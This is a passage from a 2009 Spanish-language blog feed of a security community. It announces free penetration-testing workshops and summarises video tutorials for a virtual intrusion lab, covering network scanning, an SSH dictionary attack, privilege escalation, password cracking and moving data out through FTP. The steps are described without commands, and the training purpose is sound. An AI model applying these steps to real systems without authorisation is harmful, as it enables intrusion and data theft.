<p style="text-align: justify;"><span id="more-667"></span>La segunda sección cubrirá un Test de Penetración a un sistema virtualizado de intrusión. El escenario propuesto es el siguiente:</p>
<p style="text-align: justify;">Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.1.xxx). El servidor a auditar permite que los usuarios y administradores almacenen archivos por medio de un servidor FTP. El trabajo consiste en descubrir las vulnerabilidades existentes en dicho servidor, intentando con todos los tipos de ataques que estén a su disposición.</p>
<p style="text-align: justify;">Demostrar que el sistema es vulnerable sería la mejor manera de concientizar, pues desde allí se pueden implementar mejores prácticas en materia de seguridad Informática en la empresa.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el Hack Lab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmándole la disponiblidad del espacio.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- <strong>Mekato (más que indispensable&#8230; mejor no vaya si no me lleva mekatos XD)<br />
</strong>- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong>- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!<br />
</strong>- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias).<br />
<strong>- Más mekatos</strong><br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 14 de marzo de 2009<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> <strong>Solo pueden asistir las personas que confirmen asistencia</strong> (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), lo hago de esta manera para garantizar de que todos estén cómodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-09-medellin-pentest-backtrack-4/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del 2do Hack Lab en Pereira</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-2do-hack-lab-en-pereira</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-2do-hack-lab-en-pereira#comments</comments>
		<pubDate>Wed, 11 Mar 2009 06:27:17 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pereira]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=644</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El pasado sabado 7 de marzo se llevo a cabo el segundo hack lab en la ciudad de pereira. Dejo a continuación el registro fotográfico y el enlace para más información sobre el laboratorio, además de la presentación expuesta por <a href="http://www.exactlimon.com/" target="_blank"><strong>exactlimon</strong></a> sobre <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>banner identification</strong></a>.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Lab Pereira" src="http://img16.imageshack.us/img16/6087/hacklabpereira.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;"><a href="http://anonym-url.com/go.php?to=http://www.fileden.com/files/2007/7/17/1274922/DragonJAR/Laboratorios%20Hacking-%20identificaicon%20de%20banners.pps" target="_blank"><strong>Descargar presentación expuesta sobre Banner Identification</strong></a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/laboratorios/7056-resumen-del-2do-lab-en-pereira.html" target="_blank"><strong>Más información y comentarios acerca del Hack Lab 02 en Pereira</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-2do-hack-lab-en-pereira/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del Hack Lab 08 en Medellín</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin#comments</comments>
		<pubDate>Mon, 23 Feb 2009 19:24:09 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=631</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Como siempre muchas gracias a las personas que asistieron a este 8° Hack Lab en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Lab 08 en Medellín" src="http://img404.imageshack.us/img404/7732/hacklab08web.jpg" alt="" width="450" height="338" /></p>
<p>Próximamente estaré publicando todo el material utilizado en este HackTaller, incluyendo los videos, herramientas y entornos virtualizados de intrusión.</p>
<p>Pretendo también realizar este Hack Lab en modo virtual para permitirles a las personas interesadas de otras regiones la participación activa de este tipo de eventos.</p>
<p><a href="http://img26.imageshack.us/slideshow/player.php?id=img26/9690/1235412890qup.smil" target="_blank"><strong>A continuación dejo el registro fotográfico del evento.</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>HackTaller 08 Medellín &#8211; PenTest (Repetición)</title>
		<link>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion</link>
		<comments>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion#comments</comments>
		<pubDate>Thu, 19 Feb 2009 07:48:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=620</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo nuevamente la invitación a todos los interesados en participar de este 8° HackTaller a realizarse en la ciudad de Medellín.</p>
<p style="text-align: justify;">La idea es que a este Hack Lab puedan asistir las personas que se quedaron sin cupo en el anterior o que por uno u otro motivo no pudieron asistir.</p>
<p style="text-align: justify;">La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p style="text-align: justify;">El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p style="text-align: justify;">Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong> &#8211; Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!</strong><br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 21 de Febrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Registro fotográfico del Hack Lab 07 en Medellín</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-07-en-medellin</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-07-en-medellin#comments</comments>
		<pubDate>Tue, 17 Feb 2009 00:14:54 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=581</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El pasado sábado 14 de febrero se realizó el 7° Hack Lab en la ciudad de Medellín.</p>
<div align="center"><img alt="" src="http://img4.imageshack.us/img4/3719/hacklab07us0.jpg" title="Hack Lab 07 en Medellín" class="aligncenter" width="350" height="292" /></div>
<p>Para este Hack Lab se presentó el siguiente escenario de Test de Penetración:</p>
<p>Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p>Dejo a continuación el registro fotográfico de este evento.</p>
<p><strong><a href="http://picasaweb.google.com/4v4t4r/HackLab07EnMedellin#">Ver galería >></a></strong><br />
<strong><a href="http://picasaweb.google.com/4v4t4r/HackLab07EnMedellin?feat=embedwebsite#slideshow/5303532603122913362">Ver galería en modo de presentación >></a></strong></p>
<p>Nuevamente muchas gracias a tod@s l@s asistentes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-07-en-medellin/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>HackTaller 07 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/hacktaller-07-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/hacktaller-07-medellin-pentest#comments</comments>
		<pubDate>Thu, 12 Feb 2009 19:09:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=560</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Extiendo la invitación a todos los interesados en participar de este 7° HackTaller a desarrollarse en la ciudad de Medellín.</p>
<p>La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p>El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p>Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p>Nuevamente se harán algunas definiciones necesarias y relacionadas en lo que yo llamo el arte de los Test de Penetración, para realizar de manera guiada el mismo.</p>
<p>El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p><strong>4v4t4r @ gmail . com</strong></p>
<p>Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p>- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;)<br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p>- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p><strong>Fecha:</strong> Sabado 14 de Fecbrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo&#8230; ya el que me quiera llevar cositas no me enojo XD.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-07-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna#comments</comments>
		<pubDate>Tue, 20 Jan 2009 20:03:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=528</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Luego de haber conseguido los diferentes datos de inicio de sesión de los usuarios en el sistema, procederemos a analizar y acceder la información crítica del sistema objetivo. Esto es necesario como PenTesters, pues vuelvo y repito, la finalidad de cada Test de Penetración es demostrar que tan vulnerable es el sistema, y que tan expuesto puede estar frente a los ataques de los delincuentes informáticos.</p>
<div align="center"><img alt="" src="http://img407.imageshack.us/img407/1382/openssldp4.jpg" title="OpenSSL" class="aligncenter" width="400" height="348" /></div>
<p>En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.<br />
<span id="more-528"></span><br />
Con esta sesión damos por terminado el &#8220;resumen&#8221; de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><embed src="http://blip.tv/play/Ae3kDpSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81634127/976301f8/PenTest5_LabsDragonJARorg.html ">Descargar video tutorial Test de Penetración &#8211; Acceso a la Información sensible</a></strong> (<strong>Password: </strong>www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:24:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[John The Ripper]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Shadow]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=525</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez recolectada toda la información del sistema (servicios, versiones, S.O, etc) y luego de haber realizado algunos intentos de conexión sobre ellos podemos perfilar algunos puntos de intrusión en el Sistema.</p>
<div align="center"><img alt="" src="http://img147.imageshack.us/img147/8812/xhydrazg7.jpg" title="Xhydra-PenTest" class="aligncenter" width="400" height="394" /></div>
<p>Sin lugar a dudas el servicio de SSHD &#8211; Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.<br />
<span id="more-525"></span><br />
En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.<br />
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.</p>
<p><embed src="http://blip.tv/play/Ae3kSJSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81287772/6007a169/PenTest4_LabsDragonJARorg.html">Descargar video tutorial de Test de Penetración &#8211; System Hacking</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema#comments</comments>
		<pubDate>Fri, 16 Jan 2009 14:32:06 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Putty]]></category>
		<category><![CDATA[SSH]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=522</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Comenzamos a introducirnos finalmente en el Test de Penetración, para ello se hace necesario explorar el sistema objetivo, nada mejor para ello que <strong>Nmap</strong>, <strong>Netcat</strong> y la exploración manual.</p>
<div align="center"><img alt="" src="http://img403.imageshack.us/img403/6328/penetrationjp4.jpg" title="PenTesting" class="aligncenter" width="450" height="300" /></div>
<p>Es importante obtener la mayor información del Sistema, es por ello que hacemos uso de estas herramientas, y es por ello que debemos llevar el registro escrito de lo recolectado.<br />
<span id="more-522"></span><br />
El siguiente video tutorial muestra el proceso de introducción técnica en el <strong>Test de Penetración</strong>, donde por medio de la herramienta <strong>Nmap</strong> bajo distintos perfiles de escaneo y varios intentos de conexión podemos obtener nuestros primeros objetivos: Escanear, identificar y recolectar la mayor información posible para determinar los posibles <strong>puntos de intrusión</strong>.</p>
<p><embed src="http://blip.tv/play/Ae3mOJSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80890757/85000ebf/PenTest3_LabsDragonJARorg.html">Descargar video tutorial de escaneo e identificación del sistema objetivo en el Test de Penetración.</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux#comments</comments>
		<pubDate>Thu, 15 Jan 2009 22:11:38 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=519</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
